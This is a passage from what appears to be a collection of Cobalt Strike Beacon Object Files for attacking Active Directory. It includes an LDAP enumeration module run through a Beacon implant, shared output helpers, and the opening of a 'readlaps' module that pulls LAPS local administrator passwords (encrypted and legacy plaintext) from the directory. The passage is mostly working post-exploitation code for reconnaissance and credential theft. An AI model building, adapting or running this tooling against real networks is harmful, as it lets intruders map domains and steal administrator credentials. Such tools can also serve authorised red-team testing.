		*p++ = basis_64[(string[i] >> 2) & 0x3F];
		*p++ = basis_64[((string[i] & 0x3) << 4) |
			((int)(string[i + 1] & 0xF0) >> 4)];
		*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
			((int)(string[i + 2] & 0xC0) >> 6)];
		*p++ = basis_64[string[i + 2] & 0x3F];
	}
	if (i < len) {
		*p++ = basis_64[(string[i] >> 2) & 0x3F];
		if (i == (len - 1)) {
			*p++ = basis_64[((string[i] & 0x3) << 4)];
			*p++ = '=';
		}
		else {
			*p++ = basis_64[((string[i] & 0x3) << 4) |
				((int)(string[i + 1] & 0xF0) >> 4)];
			*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
		}
		*p++ = '=';
	}

	*p++ = '\0';
	return p - encoded;
}

LDAP* InitialiseLDAPConnection(PCHAR hostName, PCHAR distinguishedName, BOOL ldaps){
	LDAP* pLdapConnection = NULL;
    ULONG result;
    int portNumber = ldaps == TRUE ? 636 : 389;

    pLdapConnection = WLDAP32$ldap_init(hostName, portNumber);

	if (pLdapConnection == NULL)
	{
		BeaconPrintf(CALLBACK_ERROR,"[-] Failed to establish LDAP connection on %d.\n", portNumber);
		return NULL;
	}

	// Set LDAP version to 3 (required for many security features)
	ULONG version = LDAP_VERSION3;
	result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_VERSION, (void*)&version);
	if (result != LDAP_SUCCESS) {
		BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set LDAP version: %lu\n", result);
	}

	if(ldaps == TRUE){
		// For LDAPS (port 636), we need SSL
		result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SSL, LDAP_OPT_ON);
		if (result != LDAP_SUCCESS) {
			BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enable SSL: %lu\n", result);
		}

		// Set the certificate callback for SSL/TLS
		result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SERVER_CERTIFICATE, (void*)&ServerCertCallback);
		if (result != LDAP_SUCCESS) {
			BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set certificate callback: %lu\n", result);
		}
	}
	else {
		// For regular LDAP (port 389), enable signing and sealing if using LDAP_AUTH_NEGOTIATE
		// These options need to be set BEFORE binding when using Negotiate auth

		// Enable LDAP signing (integrity)
		void* value = LDAP_OPT_ON;
		result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SIGN, &value);
		if (result != LDAP_SUCCESS) {
			internal_printf("[!] Warning: Failed to enable LDAP signing: %lu\n", result);
		}

		// Enable LDAP sealing (encryption) - this provides confidentiality
		result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_ENCRYPT, &value);
		if (result != LDAP_SUCCESS) {
			internal_printf("[!] Warning: Failed to enable LDAP sealing: %lu\n", result);
		}
	}

	//////////////////////////////
	// Bind to DC
	//////////////////////////////
    ULONG lRtn = 0;

    lRtn = WLDAP32$ldap_bind_s(
                pLdapConnection,      // Session Handle
                distinguishedName,    // Domain DN
                NULL,                 // Credential structure
                LDAP_AUTH_NEGOTIATE); // Auth mode - uses current user credentials with Kerberos/NTLM

	if(lRtn != LDAP_SUCCESS)
	{
		// Provide more detailed error information
		if (lRtn == LDAP_STRONG_AUTH_REQUIRED) {
			BeaconPrintf(CALLBACK_ERROR, "[-] Bind Failed: Strong authentication required (LDAP signing may be enforced by server)\n");
		} else if (lRtn == LDAP_INVALID_CREDENTIALS) {
			BeaconPrintf(CALLBACK_ERROR, "[-] Bind Failed: Invalid credentials\n");
		} else if (lRtn == LDAP_UNWILLING_TO_PERFORM) {
			BeaconPrintf(CALLBACK_ERROR, "[-] Bind Failed: Server unwilling to perform operation (check security requirements)\n");
		} else {
			BeaconPrintf(CALLBACK_ERROR, "[-] Bind Failed with error: %lu\n", lRtn);
		}
		WLDAP32$ldap_unbind(pLdapConnection);
		pLdapConnection = NULL;
	}
	else {
		internal_printf("[+] Successfully bound to LDAP server\n");
	}

	return pLdapConnection;
}

PLDAPSearch ExecuteLDAPQuery(LDAP* pLdapConnection, PCHAR distinguishedName, char * ldap_filter, char * ldap_attributes, ULONG maxResults, ULONG scope_of_search){
    internal_printf("[*] Filter: %s\n",ldap_filter);
    internal_printf("[*] Scope of search value: %lu\n",scope_of_search);

	// Security descriptor flags to read nTSecurityDescriptor as low-priv domain user
	// value taken from https://github.com/fortalice/pyldapsearch/blob/main/pyldapsearch/__main__.py (Microsoft docs mentioned XORing all possible values to get this, but that didn't work)
	int sdFlags = 0x07;
	PLDAPControlA serverControls[2];
	int aclSearch = 0;
    ULONG scope;

    ULONG errorCode = LDAP_SUCCESS;
    PLDAPSearch pSearchResult = NULL;
    PCHAR attr[MAX_ATTRIBUTES] = {0};
	if(ldap_attributes){
        internal_printf("[*] Returning specific attribute(s): %s\n",ldap_attributes);
        
        int attribute_count = 0;
        char *token = NULL;
        const char s[2] = ","; //delimiter

        token = MSVCRT$strtok(ldap_attributes, s);

        while( token != NULL ) {
			if (MSVCRT$_stricmp(token, "nTSecurityDescriptor") == 0) {
				serverControls[0] = FormatSDFlags(sdFlags);
				serverControls[1] = NULL;
				aclSearch = 1;
			}
            if(attribute_count < (MAX_ATTRIBUTES - 1)){
                attr[attribute_count] = token;
                attribute_count++;
                token = MSVCRT$strtok(NULL, s);
            } else {
                internal_printf("[!] Cannot return more than %i attributes, will omit additional attributes.\n", MAX_ATTRIBUTES);
                break;
            }
        }
    }

    if (scope_of_search == 1){
        scope = LDAP_SCOPE_BASE;
    } 
    else if (scope_of_search == 2){
        scope = LDAP_SCOPE_ONELEVEL;
    }
    else if (scope_of_search == 3){
        scope = LDAP_SCOPE_SUBTREE;
    }
    

   	if (aclSearch) {
		pSearchResult = WLDAP32$ldap_search_init_pageA(
		pLdapConnection,    // Session handle
		distinguishedName,  // DN to start search
		scope, // Scope
		ldap_filter,        // Filter
		(*attr) ? attr : NULL,               // Retrieve list of attributes
		0,                  // Get both attributes and values
		serverControls,
		NULL,
		15,
		maxResults,
		NULL);    // [out] Search results
		
		MSVCRT$free(serverControls[0]->ldctl_value.bv_val);
		MSVCRT$free(serverControls[0]);
	} else {
		pSearchResult = WLDAP32$ldap_search_init_pageA(
		pLdapConnection,    // Session handle
		distinguishedName,  // DN to start search
		scope, // Scope
		ldap_filter,        // Filter
		(*attr) ? attr : NULL,               // Retrieve list of attributes
		0,                  // Get both attributes and values
		NULL,
		NULL,
		15,
		maxResults,
		NULL);    // [out] Search results
	}
    
    if (pSearchResult == NULL) 
    {
        BeaconPrintf(CALLBACK_ERROR, "Paging not supported on this server, aborting");
    }
    return pSearchResult;

}

void customAttributes(PCHAR pAttribute, PCHAR pValue)
{
    if(MSVCRT$strcmp(pAttribute, "objectGUID") == 0) 
    {
        if(fuuidtostring == (void *)1) // I'm doing this because we ran out of function slots for dynamic function resolution
        {
           rpcrt = LoadLibraryA("rpcrt4");
           fuuidtostring = (_fuuidtostring)GetProcAddress(rpcrt, "UuidToStringA");
           frpcstringfree = (_RpcStringFreeA)GetProcAddress(rpcrt, "RpcStringFreeA");
        }
        RPC_CSTR G = NULL;
        PBERVAL tmp = (PBERVAL)pValue;
        //RPCRT4$UuidToStringA((UUID *) tmp->bv_val, &G);
        fuuidtostring((UUID *) tmp->bv_val, &G);
        internal_printf("%s", G);
        //RPCRT4$RpcStringFreeA(&G);       
        frpcstringfree(&G);
    } else if (MSVCRT$strcmp(pAttribute, "pKIExpirationPeriod") == 0 || MSVCRT$strcmp(pAttribute, "pKIOverlapPeriod") == 0 || MSVCRT$strcmp(pAttribute, "cACertificate") == 0 || MSVCRT$strcmp(pAttribute, "nTSecurityDescriptor") == 0 || MSVCRT$strcmp(pAttribute, "msDS-AllowedToActOnBehalfOfOtherIdentity") == 0 || MSVCRT$strcmp(pAttribute, "msDS-GenerationId") == 0 || MSVCRT$strcmp(pAttribute, "auditingPolicy") == 0 || MSVCRT$strcmp(pAttribute, "dSASignature") == 0 || MSVCRT$strcmp(pAttribute, "mS-DS-CreatorSID") == 0 || MSVCRT$strcmp(pAttribute, "logonHours") == 0 || MSVCRT$strcmp(pAttribute, "schemaIDGUID") == 0 || MSVCRT$strcmp(pAttribute, "mSMQDigests") == 0 || MSVCRT$strcmp(pAttribute, "mSMQSignCertificates") == 0 || MSVCRT$strcmp(pAttribute, "userCertificate") == 0 || MSVCRT$strcmp(pAttribute, "attributeSecurityGUID") == 0  ) {
		char *encoded = NULL;
		PBERVAL tmp = (PBERVAL)pValue;
		ULONG len = tmp->bv_len;
		encoded = (char *)MSVCRT$malloc((size_t)len*2);
		Base64encode(encoded, (char *)tmp->bv_val, len);
        internal_printf("%s", encoded);
		MSVCRT$free(encoded);
	}
    else if(MSVCRT$strcmp(pAttribute, "objectSid") == 0 || MSVCRT$strcmp(pAttribute, "securityIdentifier") == 0)
    {
        LPSTR sid = NULL;
		//internal_printf("len of objectSID: %d\n", MSVCRT$strlen(pValue));
        PBERVAL tmp = (PBERVAL)pValue;
        ADVAPI32$ConvertSidToStringSidA((PSID)tmp->bv_val, &sid);
        internal_printf("%s", sid);
        KERNEL32$LocalFree(sid);
    }
    else
    {
        internal_printf("%s", pValue);
    }
    
}

void printAttribute(PCHAR pAttribute, PCHAR* ppValue){
    internal_printf("\n%s: ", pAttribute);
    customAttributes(pAttribute, *ppValue);
    ppValue++;
    while(*ppValue != NULL)
    {
        internal_printf(", ");
        customAttributes(pAttribute, *ppValue);
        ppValue++;
    }
}

void ldapSearch(char * ldap_filter, char * ldap_attributes,	ULONG results_count, ULONG scope_of_search, char * hostname, char * domain, BOOL ldaps){

    
    wchar_t szDNW[1024] = {0};
	ULONG ulSize = sizeof(szDNW) / sizeof(wchar_t);
    BOOL res = (domain) ? TRUE : SECUR32$GetUserNameExW(NameFullyQualifiedDN, szDNW, &ulSize);
    char * szDN = intAlloc(ulSize + 1);
    ConvertUnicodeStringToChar(szDNW, ulSize + 1, szDN, ulSize + 1);
    DWORD dwRet = 0;
    PDOMAIN_CONTROLLER_INFO pdcInfo = NULL;
    LDAP* pLdapConnection = NULL; 
    PLDAPSearch pPageHandle = NULL;
    PLDAPMessage pSearchResult = NULL;
    char* distinguishedName = NULL;
    BerElement* pBer = NULL;
    LDAPMessage* pEntry = NULL;
    PCHAR pEntryDN = NULL;
    LDAP_TIMEVAL timeout = {20, 0};
    ULONG iCnt = 0;
    PCHAR pAttribute = NULL;
    PCHAR* ppValue = NULL;
    ULONG results_limit = 0;
    BOOL isbinary = FALSE;
    ULONG stat = 0;
    ULONG totalResults = 0;
    HMODULE wldap = LoadLibrary("wldap32");
    if(wldap == NULL) {internal_printf("Unable to load required library\n"); return;}
    _ldap_search_abondon_page searchDone = (_ldap_search_abondon_page)GetProcAddress(wldap, "ldap_search_abandon_page");
    if(searchDone == NULL) {internal_printf("Unable to load required function"); return;}

	distinguishedName = (domain) ? domain : MSVCRT$strstr(szDN, "DC=");
	if(distinguishedName != NULL && res) {
    	internal_printf("[*] Distinguished name: %s\n", distinguishedName);	
	}
	else{
		BeaconPrintf(CALLBACK_ERROR, "Failed to retrieve distinguished name.");
        return;

	}

	////////////////////////////
	// Retrieve PDC
	////////////////////////////
    
    dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
    if (ERROR_SUCCESS == dwRet || hostname) {
        if(!hostname){
            internal_printf("[*] targeting DC: %s\n", pdcInfo->DomainControllerName);       
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "Failed to identify PDC, are we domain joined?");
        goto end;
    }


	//////////////////////////////
	// Initialise LDAP Session
    // Taken from https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ldap/searching-a-directory
	//////////////////////////////
    char * targetdc = (hostname == NULL) ? pdcInfo->DomainControllerName + 2 : hostname;
    internal_printf("Binding to %s\n", targetdc);
    pLdapConnection = InitialiseLDAPConnection(targetdc, distinguishedName, ldaps);

    if(!pLdapConnection){
        internal_printf("Failed to bind to %s", targetdc);
        goto end;
    }

	//////////////////////////////
	// Perform LDAP Search
	//////////////////////////////
	pPageHandle = ExecuteLDAPQuery(pLdapConnection, distinguishedName, ldap_filter, ldap_attributes, results_count, scope_of_search);   
    ULONG pagecount = 0;
    do
    {
        stat = WLDAP32$ldap_get_next_page_s(pLdapConnection, pPageHandle, &timeout, (results_count && ((results_count - totalResults) < 64))  ? results_count - totalResults : 64, &pagecount,&pSearchResult );
        if(!pSearchResult || ! (stat == LDAP_SUCCESS || stat == LDAP_NO_RESULTS_RETURNED))
            {goto end;}

        //////////////////////////////
        // Get Search Result Count
        //////////////////////////////
        DWORD numberOfEntries = WLDAP32$ldap_count_entries(
                            pLdapConnection,    // Session handle
                            pSearchResult);     // Search result
        
        if(numberOfEntries == -1) // -1 is functions return value when it failed
        {
            BeaconPrintf(CALLBACK_ERROR, "Failed to count search results.");
            goto end;
        }
        else if(!numberOfEntries)
        {
            BeaconPrintf(CALLBACK_ERROR, "Search returned zero results");
            goto end;
        }    
        
        totalResults += numberOfEntries;


        for( iCnt=0; iCnt < numberOfEntries; iCnt++ )
        {
            internal_printf("\n--------------------");

            // Get the first/next entry.
            if( !iCnt )
                {pEntry = WLDAP32$ldap_first_entry(pLdapConnection, pSearchResult);}
            else
                {pEntry = WLDAP32$ldap_next_entry(pLdapConnection, pEntry);}
            
            if( pEntry == NULL )
            {
                break;
            }
                    
            // Get the first attribute name.
            pAttribute = WLDAP32$ldap_first_attribute(
                        pLdapConnection,   // Session handle
                        pEntry,            // Current entry
                        &pBer);            // [out] Current BerElement
            
            // Output the attribute names for the current object
            // and output values.
            while(pAttribute != NULL)
            {
                isbinary = FALSE;
                // Get the string values.
				if(MSVCRT$strcmp(pAttribute, "pKIExpirationPeriod") == 0 || MSVCRT$strcmp(pAttribute, "pKIOverlapPeriod") == 0 || MSVCRT$strcmp(pAttribute, "cACertificate") == 0 || MSVCRT$strcmp(pAttribute, "objectSid") == 0 || MSVCRT$strcmp(pAttribute, "securityIdentifier") == 0 || MSVCRT$strcmp(pAttribute, "objectGUID") == 0 || MSVCRT$strcmp(pAttribute, "nTSecurityDescriptor") == 0 || MSVCRT$strcmp(pAttribute, "msDS-GenerationId") == 0 || MSVCRT$strcmp(pAttribute, "auditingPolicy") == 0 || MSVCRT$strcmp(pAttribute, "dSASignature") == 0 || MSVCRT$strcmp(pAttribute, "mS-DS-CreatorSID") == 0 || MSVCRT$strcmp(pAttribute, "logonHours") == 0 || MSVCRT$strcmp(pAttribute, "schemaIDGUID") == 0 || MSVCRT$strcmp(pAttribute, "msDS-AllowedToActOnBehalfOfOtherIdentity") == 0 || MSVCRT$strcmp(pAttribute, "msDS-GenerationId") == 0 || MSVCRT$strcmp(pAttribute, "mSMQDigests") == 0 || MSVCRT$strcmp(pAttribute, "mSMQSignCertificates") == 0 || MSVCRT$strcmp(pAttribute, "userCertificate") == 0 || MSVCRT$strcmp(pAttribute, "attributeSecurityGUID") == 0 )
      			{
					ppValue = (char **)WLDAP32$ldap_get_values_lenA(pLdapConnection, pEntry, pAttribute); //not really a char **
                    isbinary = TRUE;
				} else {
                    ppValue = WLDAP32$ldap_get_values(
                                pLdapConnection,  // Session Handle
                                pEntry,           // Current entry
                                pAttribute);      // Current attribute
                }


                // Use and Free memory.
                if(ppValue != NULL)  
                {
                    printAttribute(pAttribute, ppValue);
                    if(isbinary)
                    {WLDAP32$ldap_value_free_len((PBERVAL *)ppValue);}
                    else
                    {WLDAP32$ldap_value_free(ppValue);}
                    ppValue = NULL;
                }
                WLDAP32$ldap_memfree(pAttribute);
                
                // Get next attribute name.
                pAttribute = WLDAP32$ldap_next_attribute(
                    pLdapConnection,   // Session Handle
                    pEntry,            // Current entry
                    pBer);             // Current BerElement
            }
            
            if( pBer != NULL )
            {
                WLDAP32$ber_free(pBer,0);
                pBer = NULL;
            }
        }
        if(totalResults >= results_count && results_count != 0)
        {
            break;
        }
        WLDAP32$ldap_msgfree(pSearchResult); pSearchResult = NULL;
    }while(stat == LDAP_SUCCESS);

    end: 
	internal_printf("\nretrieved %lu results total\n", totalResults);
    if(pPageHandle)
    {
        searchDone(pLdapConnection, pPageHandle);
    }
    if( pBer != NULL )
    {
        WLDAP32$ber_free(pBer,0);
        pBer = NULL;
    }
    if(pdcInfo)
    {
        NETAPI32$NetApiBufferFree(pdcInfo);
        pdcInfo = NULL;
    }
    if(pLdapConnection)
    {
        WLDAP32$ldap_unbind(pLdapConnection);
        pLdapConnection = NULL;
    }
    if(pSearchResult)
    {
        WLDAP32$ldap_msgfree(pSearchResult);
        pSearchResult = NULL;
    }
    if (ppValue)
    {
        WLDAP32$ldap_value_free(ppValue);
        ppValue = NULL;
    }    
    if(wldap)
    {
        FreeLibrary(wldap);
        wldap = NULL;
    }
    intFree(szDN);

}



VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	datap  parser;
	const wchar_t * ldap_filterW = NULL;
	char * ldap_attributes;
    char * hostname;
    char * domain;
	ULONG results_count;
    ULONG scope_of_search;
    ULONG ldaps;

	BeaconDataParse(&parser, Buffer, Length);
    ldap_filterW = (const wchar_t*) BeaconDataExtract(&parser, NULL);
	SIZE_T ldap_filterLen = KERNEL32$lstrlenW(ldap_filterW);
    char * ldap_filter = intAlloc(ldap_filterLen + 1);
    ConvertUnicodeStringToChar(ldap_filterW, ldap_filterLen + 1, ldap_filter, ldap_filterLen + 1);
    ldap_attributes = BeaconDataExtract(&parser, NULL);
    if(MSVCRT$strcmp(ldap_attributes, "*") == 0)
        ldap_attributes = NULL;
    results_count = BeaconDataInt(&parser);
    scope_of_search = BeaconDataInt(&parser);
    hostname = BeaconDataExtract(&parser, NULL);
    if(hostname[0] == 0){
        hostname = NULL;
    }
    domain = BeaconDataExtract(&parser, NULL);
    if(domain[0] == 0){
        domain = NULL;
    }
    ldaps = BeaconDataInt(&parser);

    if(!bofstart())
	{
		return;
	}

	ldapSearch(ldap_filter, ldap_attributes, results_count, scope_of_search, hostname, domain, ldaps==1);
    intFree(ldap_filter);
	printoutput(TRUE);
    if(fuuidtostring != (void *)1)
    {
        FreeLibrary(rpcrt);
    }
    bofstop();
};

================================================
FILE: AD-BOF/readlaps/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: AD-BOF/readlaps/readlaps.c
================================================
// Reference: https://github.com/xpn/RandomTSScripts/blob/master/lapsv2decrypt/bof/lapsv2decrypt.cpp

#include <windows.h>
#include <ncrypt.h>
#include <winldap.h>
#include <winber.h>
#define DYNAMIC_LIB_COUNT 2

#include "base.c"

#ifndef NCRYPT_SILENT_FLAG
#define NCRYPT_SILENT_FLAG 0x00000040
#endif

typedef ULONG_PTR NCRYPT_STREAM_HANDLE;

typedef SECURITY_STATUS (WINAPI *PFNCryptStreamOutputCallback)(
    void *pvCallbackCtxt,
    const BYTE *pbData,
    SIZE_T cbData,
    BOOL fFinal);

typedef struct NCRYPT_PROTECT_STREAM_INFO {
    PFNCryptStreamOutputCallback pfnStreamOutput;
    void *pvCallbackCtxt;
} NCRYPT_PROTECT_STREAM_INFO;

// WLDAP32 function pointers
typedef LDAP *LDAPAPI (*ldap_initA_t)(PSTR HostName, ULONG PortNumber);
typedef ULONG LDAPAPI (*ldap_bind_sA_t)(LDAP *ld, const PSTR dn, const PCHAR cred, ULONG method);
typedef ULONG LDAPAPI (*ldap_unbind_t)(LDAP *ld);
typedef ULONG LDAPAPI (*ldap_search_s_t)(LDAP *ld, const PSTR base, ULONG scope, const PSTR filter, PCHAR attrs[], ULONG attrsonly, LDAPMessage **res);
typedef ULONG LDAPAPI (*ldap_count_entries_t)(LDAP *ld, LDAPMessage *res);
typedef LDAPMessage* LDAPAPI (*ldap_first_entry_t)(LDAP *ld, LDAPMessage *res);
typedef struct berval **LDAPAPI (*ldap_get_values_lenA_t)(LDAP *ld, LDAPMessage *entry, const PCHAR attr);
typedef ULONG LDAPAPI (*ldap_value_free_len_t)(struct berval **vals);
typedef ULONG LDAPAPI (*ldap_msgfree_t)(LDAPMessage *res);

#define WLDAP32$ldap_initA ((ldap_initA_t)DynamicLoad("WLDAP32", "ldap_initA"))
#define WLDAP32$ldap_bind_sA ((ldap_bind_sA_t)DynamicLoad("WLDAP32", "ldap_bind_sA"))
#define WLDAP32$ldap_unbind ((ldap_unbind_t)DynamicLoad("WLDAP32", "ldap_unbind"))
#define WLDAP32$ldap_search_s ((ldap_search_s_t)DynamicLoad("WLDAP32", "ldap_search_s"))
#define WLDAP32$ldap_count_entries ((ldap_count_entries_t)DynamicLoad("WLDAP32", "ldap_count_entries"))
#define WLDAP32$ldap_first_entry ((ldap_first_entry_t)DynamicLoad("WLDAP32", "ldap_first_entry"))
#define WLDAP32$ldap_get_values_lenA ((ldap_get_values_lenA_t)DynamicLoad("WLDAP32", "ldap_get_values_lenA"))
#define WLDAP32$ldap_value_free_len ((ldap_value_free_len_t)DynamicLoad("WLDAP32", "ldap_value_free_len"))
#define WLDAP32$ldap_msgfree ((ldap_msgfree_t)DynamicLoad("WLDAP32", "ldap_msgfree"))

// NCRYPT function pointers
typedef SECURITY_STATUS (WINAPI *NCryptStreamOpenToUnprotect_t)(
    NCRYPT_PROTECT_STREAM_INFO *pStreamInfo,
    DWORD dwFlags,
    HWND hWnd,
    NCRYPT_STREAM_HANDLE *phStream);

typedef SECURITY_STATUS (WINAPI *NCryptStreamUpdate_t)(
    NCRYPT_STREAM_HANDLE hStream,
    const BYTE *pbData,
    SIZE_T cbData,
    BOOL fFinal);

typedef SECURITY_STATUS (WINAPI *NCryptStreamClose_t)(
    NCRYPT_STREAM_HANDLE hStream);

#define NCRYPT$NCryptStreamOpenToUnprotect ((NCryptStreamOpenToUnprotect_t)DynamicLoad("NCRYPT", "NCryptStreamOpenToUnprotect"))
#define NCRYPT$NCryptStreamUpdate ((NCryptStreamUpdate_t)DynamicLoad("NCRYPT", "NCryptStreamUpdate"))
#define NCRYPT$NCryptStreamClose ((NCryptStreamClose_t)DynamicLoad("NCRYPT", "NCryptStreamClose"))

// Blob header structure
struct blob_header {
    unsigned int upperdate;
    unsigned int lowerdate;
    unsigned int encryptedBufferSize;
    unsigned int flags;
};


// LDAP search function - returns TRUE if found, sets isEncrypted flag
BOOL searchLdap(PSTR ldapServer, ULONG port, PCHAR rootDN, PCHAR searchFilter, char **output, int* length, BOOL* isEncrypted) {
    LDAP *ldapHandle = NULL;
    PLDAPMessage searchResult = NULL;
    PCHAR attr[] = { "msLAPS-EncryptedPassword", "ms-Mcs-AdmPwd", NULL };
    ULONG entryCount;
    PLDAPMessage firstEntry = NULL;
    struct berval** outval = NULL;
    ULONG result;

    *isEncrypted = TRUE; // Default to encrypted (LAPS v2)

    ldapHandle = WLDAP32$ldap_initA(ldapServer, port);
    if (ldapHandle == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Error Initialising LDAP connection: ldap_initA");
        return FALSE;
    }

    result = WLDAP32$ldap_bind_sA(ldapHandle, rootDN, NULL, LDAP_AUTH_NEGOTIATE);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Error binding to LDAP server (code: 0x%x). Try using a hostname instead of IP address.", result);
        WLDAP32$ldap_unbind(ldapHandle);
        return FALSE;
    }

    result = WLDAP32$ldap_search_s(ldapHandle, rootDN, LDAP_SCOPE_SUBTREE, searchFilter, attr, 0, &searchResult);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] LDAP search failed (code: 0x%x)", result);
        if (searchResult != NULL)
            WLDAP32$ldap_msgfree(searchResult);
        WLDAP32$ldap_unbind(ldapHandle);
        return FALSE;
    }

    entryCount = WLDAP32$ldap_count_entries(ldapHandle, searchResult);
    if (entryCount == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[!] 0 results found from LDAP");
        if (searchResult != NULL)
            WLDAP32$ldap_msgfree(searchResult);
        WLDAP32$ldap_unbind(ldapHandle);
        return FALSE;
    }

    firstEntry = WLDAP32$ldap_first_entry(ldapHandle, searchResult);
    if (firstEntry == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Error getting first LDAP entry");
        if (searchResult != NULL)
            WLDAP32$ldap_msgfree(searchResult);
        WLDAP32$ldap_unbind(ldapHandle);
        return FALSE;
    }

    // Try LAPS v2 attribute first
    outval = WLDAP32$ldap_get_values_lenA(ldapHandle, firstEntry, attr[0]);
    if (outval == NULL) {
        // Try legacy LAPS attribute
        outval = WLDAP32$ldap_get_values_lenA(ldapHandle, firstEntry, attr[1]);
        if (outval == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Computer found but no LAPS password attribute present");
            if (searchResult != NULL)
                WLDAP32$ldap_msgfree(searchResult);
            WLDAP32$ldap_unbind(ldapHandle);
            return FALSE;
        }
        *isEncrypted = FALSE; // Legacy LAPS is plaintext
